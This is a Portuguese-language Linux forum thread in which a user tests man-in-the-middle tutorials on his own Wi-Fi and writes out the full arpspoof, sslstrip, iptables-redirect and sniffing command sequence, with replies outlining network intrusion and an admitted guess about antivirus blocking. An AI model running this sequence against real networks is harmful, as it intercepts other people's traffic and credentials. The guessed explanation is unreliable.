Ataques Man-in-the-Midle [RESOLVIDO]

1. Ataques Man-in-the-Midle [RESOLVIDO]

luciano chagas pereira
Luciano_chagas

(usa Debian)

Enviado em 09/11/2016 - 18:01h

Resolvi testar algumas "receita de bolo" que tenho visto em sites e no youtube sobre mitm. Todas com eficiência de 100% em ambientes controlados (maquina virtual e etc). Resolvi testar na pratica estes tutoriais e não obtive resultados satisfatórios.
Os testes ocorreram da seguinte maneira:
Notebook atacante com Kali Linux 2.0
Notebook alvo com windows 7 e antivirus avast.
O ambiente foi na minha própria rede wifi.
1° Teste:
SSLstrip e Arpspoof:
Sintaxe:
Terminal 01:
# echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
#sslstrip -a -l 10000
Terminal 02:
#arpspoof -i wlan0 -t ipdoalvo ipdogateway
Terminal 03:
#tail -f sslstrip.log (para ver em tempo real a saida do sslstrip, nada que tivesse nexo)
Terminal 04:
#driftnet -i wlan0 (para visualizar imagens)
Terminal 05:
#urlsnarf -i wlan0 (para visualizar url acessadas)
Terminal 06:
#mailsnarf -i wlan0 (visualizar emails)

Foram acessados através do FIREFOX e GOOGLE CHROME os seguintes sites:
www.g1.com (apareceu as imagens e url)
www.facebook.com (não apareceu nada: imagens,url, login)
www.yahoo.com/mail (nada também)
www.gmail.com (nada também)
youtube.com (nada também)

Somente funcionou para sites comuns ( de noticias, blogs e etc)
Quando o mesmo experimento foi conduzido com sslstrip e ettercap (em substituição ao arpspoof) tanto no modo grafico como no modo texto. O avast bloqueou imediatamente o acesso aos sites pelos referidos navegadores.
Por favor aguardo comentários de pessoas que realmente tenham conhecimento em segurança de redes.




  


2. Re: Ataques Man-in-the-Midle

Jeffersson Abreu
ctw6av

(usa Nenhuma)

Enviado em 09/11/2016 - 20:11h

Luciano_chagas escreveu:
Por favor aguardo comentários de pessoas que realmente tenham conhecimento em segurança de redes.


Não tenho mais vou comentar, alguém garantiu que funcionaria? Entende o SSL? Entende o ARP?

Não me leve a mal, é só para saber oque você quer saber?


______________________________________________________________________
OS: Kali Linux kali-rolling kali-rolling
Kernel: x86_64 Linux 4.6.0-kali1-amd64
Resolution: 2390x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB


3. Re: Ataques Man-in-the-Midle

luciano chagas pereira
Luciano_chagas

(usa Debian)

Enviado em 09/11/2016 - 20:23h

ctw6av escreveu:

Luciano_chagas escreveu:
Por favor aguardo comentários de pessoas que realmente tenham conhecimento em segurança de redes.


Não tenho mais vou comentar, alguém garantiu que funcionaria? Entende o SSL? Entende o ARP?

Não me leve a mal, é só para saber oque você quer saber?


Então colega.
Quanto a garantia de que funciona, e mostrada em todos os sites e canais do youtube em que pesquisei.
Entendo que o arpspoof faz o desvio do trafego de dados para passar pela maquina atacante,
e o sslstrip faz a captura destes dados. E segundo a sintaxe #sslstrip -a -l era para capturar todo o trafego (http e ssl).
Sou um leigo no assunto tentando entender como funciona a captura de dados. Não tenho intenção de fazer mau uso, mas entendendo como realmente funciona e o que realmente funciona posso monitorar minha rede domestica que não é tão pequena.



______________________________________________________________________
OS: Kali Linux kali-rolling kali-rolling
Kernel: x86_64 Linux 4.6.0-kali1-amd64
Resolution: 2390x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB





4. Re: Ataques Man-in-the-Midle [RESOLVIDO]

Jeffersson Abreu
ctw6av

(usa Nenhuma)

Enviado em 09/11/2016 - 21:31h

Rapaz... não entrarei em detalhes sobre o TLS/SSL por quê o assunto é muito extenso, mas, posso te dizer que a maioria desses "ataques", digo quando praticados por pessoas (não eu) que sabem oque e como estão fazendo, funcionam da seguinte forma:

1° A rede é invadida, quando digo rede não me refiro somente a wireless.
2° É aberto alguma forma de gerenciamento como ssh, telnet ou a famosa shell.
3° Após o 2° passo, fica fácil mudar as regras do firewall redirecionando e modificando o tráfego e derrubando as regras de proteção

Eu se fosse usar, faria dessa forma, não chegaria e jogaria um sniffer na rede e esperaria os resultados. Mas isso sou eu!

Uma coisa que já posso te dizer logo de cara é que o bloqueio do avast DEVE ter se dado ao fato da porta 10000 e não as default 8080/443 isso já é um alarde para o assustado avast e o chrome que não gosta de ninguém além dele espionando os usuários kkkkkk



______________________________________________________________________
OS: Kali Linux kali-rolling kali-rolling
Kernel: x86_64 Linux 4.6.0-kali1-amd64
Resolution: 2390x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB


5. Re: Ataques Man-in-the-Midle [RESOLVIDO]

Perfil removido
removido

(usa Nenhuma)

Enviado em 09/11/2016 - 22:08h

É meio teórico, mas um caminho é dar uma espiada nas RFCs.

https://pt.wikipedia.org/wiki/Request_for_Comments

No link acima explica o que são.

----------------------------------------------------------------------------------------------------------------
Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
(anônimo)

Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden



6. Re: Ataques Man-in-the-Midle [RESOLVIDO]

Jeffersson Abreu
ctw6av

(usa Nenhuma)

Enviado em 10/11/2016 - 00:53h

listeiro_037 escreveu:

É meio teórico, mas um caminho é dar uma espiada nas RFCs.

https://pt.wikipedia.org/wiki/Request_for_Comments

No link acima explica o que são.

^Melhor resposta.

É uma ótima dica, eu sempre procuro as RFC's quando tenho alguma dúvida ou quero realmente aprender algo, pois, é quem entende e cria que escreve, sendo assim, se torna um conteúdo de grande vália para quem quer aprender.


______________________________________________________________________
OS: Biebian
Kernel: x86_64 3.5.2-amd64
Resolution: 1320x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB
Distro: http://biebian.sourceforge.net/


7. Re: Ataques Man-in-the-Midle [RESOLVIDO]

luciano chagas pereira
Luciano_chagas

(usa Debian)

Enviado em 10/11/2016 - 10:50h

ctw6av escreveu:

listeiro_037 escreveu:

É meio teórico, mas um caminho é dar uma espiada nas RFCs.

https://pt.wikipedia.org/wiki/Request_for_Comments

No link acima explica o que são.

^Melhor resposta.

É uma ótima dica, eu sempre procuro as RFC's quando tenho alguma dúvida ou quero realmente aprender algo, pois, é quem entende e cria que escreve, sendo assim, se torna um conteúdo de grande vália para quem quer aprender.

Vou ver as RFC's. Mas uma duvida que pairou foi o fato de eu ter usado a porta 10000 e não 8080 como mencionado em um dos comentarios e o avast acabou bloqueando.


______________________________________________________________________
OS: Biebian
Kernel: x86_64 3.5.2-amd64
Resolution: 1320x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB
Distro: http://biebian.sourceforge.net/





8. Re: Ataques Man-in-the-Midle [RESOLVIDO]

luciano chagas pereira
Luciano_chagas

(usa Debian)

Enviado em 10/11/2016 - 14:36h

Bom! Vou dar por encerrado o tópico. Meu objetivo era saber se estes tutorias sobre mitm divulgados intensamente em vários canais do youtube e sites pela internet realmente teriam alguma eficiência tal como são divulgados. A conclusão que cheguei é que em ambiente simulado (maquina virtual) funciona, mais na pratica não! Um pc com firewall bem configurado e um bom antivirus são resistentes aos pseudos "hackers de youtube". Tenho uma rede domestica (familiar) com 32 dispositivos conectados e na familia tem alguns pentelhos que vivem estudando estes tutoriais de youtube pra querer bagunçar na rede.
Obrigado a todos que comentaram.



9. Re: Ataques Man-in-the-Midle [RESOLVIDO]

Jeffersson Abreu
ctw6av

(usa Nenhuma)

Enviado em 10/11/2016 - 19:18h

Vou ver as RFC's. Mas uma duvida que pairou foi o fato de eu ter usado a porta 10000 e não 8080 como mencionado em um dos comentarios e o avast acabou bloqueando


As vezes nem isso foi amigo, eu chutei essa, não tenho conhecimento algum para afirmar isso.



______________________________________________________________________
OS: Biebian
Kernel: x86_64 3.5.2-amd64
Resolution: 1320x768
CPU: Intel Core i3-4005U CPU @ 1.7GHz
RAM: 3852MiB
Distro: http://biebian.sourceforge.net/






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts